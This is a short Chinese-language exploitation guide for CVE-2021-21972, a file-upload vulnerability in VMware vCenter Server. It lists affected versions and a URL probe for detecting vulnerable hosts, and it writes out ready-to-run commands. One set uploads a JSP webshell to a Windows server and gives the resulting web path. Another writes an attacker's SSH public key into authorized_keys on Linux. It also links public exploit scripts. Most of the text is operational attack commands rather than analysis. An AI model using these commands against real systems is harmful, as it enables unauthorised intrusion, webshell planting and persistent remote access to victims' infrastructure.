CVE-2021-21972 vCenter Serve 任意文件上传

影响范围

• vCenter Server7.0 < 7.0.U1c
• vCenter Server6.7 < 6.7.U3l
• vCenter Server6.5 < 6.5.U3n

POC

/ui/vropspluginui/rest/services/uploadova

访问上面的路径，如果404，则代表不存在漏洞，如果405 则可能存在漏洞

windows机器：

漏洞利用： https://github.com/horizon3ai/CVE-2021-21972

python CVE-2021-21972.py -t x.x.x.x -p ProgramData\VMware\vCenterServer\data\perfcharts\tc-instance\webapps\statsreport\gsl.jsp -o win -f gsl.jsp

-t （目标地址）
-f （上传的文件）
-p （上传后的webshell路径，默认不用改）

上传后的路径为

https://x.x.x.x/statsreport/gsl.jsp

完整路径为

C:/ProgramData/VMware/vCenterServer/data/perfcharts/tc-instance/webapps/statsreport

Linux机器：

1、写公私钥（需要22端口开放）

python3 CVE-2021-21972.py -t x.x.x.x -p /home/vsphere-ui/.ssh/authorized_keys -o unix -f id_rsa_2048.pub

2、遍历写shell（时间较久）

https://github.com/NS-Sp4ce/CVE-2021-21972